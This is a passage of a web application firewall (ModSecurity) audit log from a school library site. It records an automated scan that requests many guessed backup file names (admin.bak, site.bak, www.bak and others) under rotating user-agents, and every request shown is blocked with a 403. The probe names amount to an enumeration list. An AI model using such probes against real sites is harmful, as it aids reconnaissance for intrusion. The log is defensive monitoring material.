(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea8a2d3d-Z-- --9f2eba7a-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdZgAAAMc 103.236.140.4 53740 103.236.140.4 8181 --9f2eba7a-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.4.0) Gecko/20100101 Firefox/52.4.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994675 --9f2eba7a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f2eba7a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855512649 9138 (- - -) Stopwatch2: 1747543855512649 9138; combined=1075, p1=368, p2=677, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2eba7a-Z-- --fe98d503-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdcQAAAMc 103.236.140.4 55616 103.236.140.4 8181 --fe98d503-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150536207 --fe98d503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fe98d503-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855522138 2593 (- - -) Stopwatch2: 1747543855522138 2593; combined=785, p1=399, p2=352, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe98d503-Z-- --524fe66e-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8CgAAAAU 103.236.140.4 55596 103.236.140.4 8181 --524fe66e-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127883807 --524fe66e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --524fe66e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855519024 5882 (- - -) Stopwatch2: 1747543855519024 5882; combined=705, p1=290, p2=383, p3=0, p4=0, p5=32, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --524fe66e-Z-- --1369964f-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8EwAAAAU 103.236.140.4 55736 103.236.140.4 8181 --1369964f-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2; rv:52.9.0) Gecko/20100101 Firefox/52.9.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152305670 --1369964f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1369964f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855526193 2653 (- - -) Stopwatch2: 1747543855526193 2653; combined=753, p1=380, p2=333, p3=0, p4=0, p5=39, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1369964f-Z-- --2015997a-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSQQAAAIk 103.236.140.4 55738 103.236.140.4 8181 --2015997a-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240137 --2015997a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2015997a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855526648 10970 (- - -) Stopwatch2: 1747543855526648 10970; combined=936, p1=443, p2=329, p3=0, p4=0, p5=163, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2015997a-Z-- --35023168-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSVQAAAI8 103.236.140.4 55660 103.236.140.4 8181 --35023168-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154009609 --35023168-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --35023168-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855625478 4087 (- - -) Stopwatch2: 1747543855625478 4087; combined=874, p1=535, p2=311, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35023168-Z-- --6d475e35-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSWQAAAJE 103.236.140.4 55458 103.236.140.4 8181 --6d475e35-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4; rv:52.5.0) Gecko/20100101 Firefox/52.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123016404 --6d475e35-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d475e35-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855627617 5124 (- - -) Stopwatch2: 1747543855627617 5124; combined=2464, p1=735, p2=1616, p3=0, p4=0, p5=113, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d475e35-Z-- --ae948717-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8KQAAAAY 103.236.140.4 55610 103.236.140.4 8181 --ae948717-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155222019 --ae948717-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae948717-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855633579 2151 (- - -) Stopwatch2: 1747543855633579 2151; combined=769, p1=387, p2=352, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae948717-Z-- --90df5442-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdhAAAAMg 103.236.140.4 53770 103.236.140.4 8181 --90df5442-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118036587 --90df5442-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --90df5442-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855629389 7031 (- - -) Stopwatch2: 1747543855629389 7031; combined=1814, p1=1335, p2=451, p3=0, p4=0, p5=27, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90df5442-Z-- --376f4b6d-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSaAAAAJQ 103.236.140.4 54204 103.236.140.4 8181 --376f4b6d-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 10645775 --376f4b6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --376f4b6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855637259 2856 (- - -) Stopwatch2: 1747543855637259 2856; combined=1407, p1=389, p2=989, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --376f4b6d-Z-- --a1cb6028-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8LQAAAAg 103.236.140.4 55746 103.236.140.4 8181 --a1cb6028-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93678564 --a1cb6028-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1cb6028-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855635642 8166 (- - -) Stopwatch2: 1747543855635642 8166; combined=4467, p1=3385, p2=365, p3=0, p4=0, p5=716, sr=728, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1cb6028-Z-- --a832ae37-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EcAAAAEo 103.236.140.4 55598 103.236.140.4 8181 --a832ae37-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149126423 --a832ae37-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a832ae37-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855642744 3046 (- - -) Stopwatch2: 1747543855642744 3046; combined=864, p1=391, p2=437, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a832ae37-Z-- --f79e3617-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSdQAAAIM 103.236.140.4 55668 103.236.140.4 8181 --f79e3617-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 144011491 --f79e3617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f79e3617-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855643975 2088 (- - -) Stopwatch2: 1747543855643975 2088; combined=825, p1=420, p2=375, p3=0, p4=0, p5=30, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79e3617-Z-- --e35cb40a-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8MQAAAAw 103.236.140.4 55652 103.236.140.4 8181 --e35cb40a-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0.2) Gecko/20100101 Firefox/55.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151486473 --e35cb40a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e35cb40a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855642978 3761 (- - -) Stopwatch2: 1747543855642978 3761; combined=1613, p1=359, p2=1220, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35cb40a-Z-- --33e7792e-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8LwAAAAo 103.236.140.4 55690 103.236.140.4 8181 --33e7792e-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0.1) Gecko/20100101 Firefox/58.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153845766 --33e7792e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33e7792e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855637616 9611 (- - -) Stopwatch2: 1747543855637616 9611; combined=2604, p1=648, p2=1927, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e7792e-Z-- --5ddb0528-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8NwAAABY 103.236.140.4 55736 103.236.140.4 8181 --5ddb0528-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149579248 --5ddb0528-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ddb0528-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855643023 6221 (- - -) Stopwatch2: 1747543855643023 6221; combined=1197, p1=422, p2=752, p3=0, p4=0, p5=23, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ddb0528-Z-- --8d20db76-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSgAAAAJU 103.236.140.4 56200 103.236.140.4 8181 --8d20db76-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 OPR/54.0.2952.71 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150798348 --8d20db76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8d20db76-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line 